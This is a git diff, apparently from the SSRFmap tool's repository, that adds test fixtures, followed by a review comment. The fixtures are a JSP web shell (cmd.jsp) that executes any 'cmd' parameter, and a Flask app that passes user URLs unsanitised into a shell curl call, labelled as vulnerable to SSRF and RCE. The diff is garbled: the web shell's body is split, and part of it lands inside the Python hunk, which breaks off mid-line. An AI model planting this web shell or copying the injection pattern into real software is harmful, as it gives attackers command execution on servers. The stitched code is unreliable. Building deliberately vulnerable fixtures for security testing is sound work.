diff --git a/data/cmd.jsp b/data/cmd.jsp
new file mode 100644
index 0000000..a7d2bb7
--- /dev/null
+++ b/data/cmd.jsp
@@ -0,0 +1,23 @@
+<%@ page import="java.util.*,java.io.*"%>
+
+ ++<% +if (request.getParameter("cmd") != null) { + out.println("Command: " + request.getParameter("cmd") + "+ \ No newline at end of file
diff --git a/data/example.py b/data/example.py
new file mode 100644
index 0000000..ddacbba
--- /dev/null
+++ b/data/example.py
@@ -0,0 +1,58 @@
+# NOTE: do not try this at home - highly vulnerable ! (SSRF and RCE)
+# NOTE: this file should become a simple ssrf example in order to test SSRFmap
+# FLASK_APP=example.py flask run
+
+from flask import Flask, abort, request
+import json
+import re
+import subprocess
+
+app = Flask(__name__)
+
+@app.route("/")
+def hello():
+ return "SSRF Example!"
+
+# curl -i -X POST -d 'url=http://example.com' http://localhost:5000/ssrf
+@app.route("/ssrf", methods=['POST'])
+def ssrf():
+ data = request.values
+ content = command(f"curl {data.get('url')}")
+ return content
+
+# curl -i -H "Content-Type: application/json" -X POST -d '{"url": "http://example.com"}' http://localhost:5000/ssrf2
+@app.route("/ssrf2", methods=['POST'])
+def ssrf2():
+ data = request.json
+ print(data)
+ print(data.get('url'))
+ content = command(f"curl {data.get('url')}")
+ return content
+
+# curl -v "http://127.0.0.1:5000/ssrf3?url=http://example.com"
+@app.route("/ssrf3", methods=['GET'])
+def ssrf3():
+ data = request.values
+ content = command(f"curl {data.get('url')}")
+ return content
+
+# curl -X POST -H "Content-Type: application/xml" -d '
");
+ Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+ OutputStream os = p.getOutputStream();
+ InputStream in = p.getInputStream();
+ DataInputStream dis = new DataInputStream(in);
+ String disr = dis.readLine();
+ while ( disr != null ) {
+ out.println(disr);
+ disr = dis.readLine();
+ }
+ }
+%>
+
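Review bot: data/cmd.jsp carries no header saying it is an intentionally vulnerable test fixture, while the sibling data/example.py added in the same commit opens with `# NOTE: do not try this at home - highly vulnerable ! (SSRF and RCE)`; a matching JSP comment at the top of the file, such as `<%-- NOTE: deliberately vulnerable test fixture for SSRFmap - never deploy on a reachable server --%>`, would keep the two files consistent and make the purpose obvious to anyone who finds the file in the repository or in a scanner report. Within the hunk, `OutputStream os = p.getOutputStream();` is assigned and never used, and `DataInputStream.readLine()` is a deprecated API, which is worth a one-line comment if the fixture is kept as is. The hunk's lines appear interleaved with the example.py section by page extraction, so the exact line order of the JSP body could not be confirmed from what is visible.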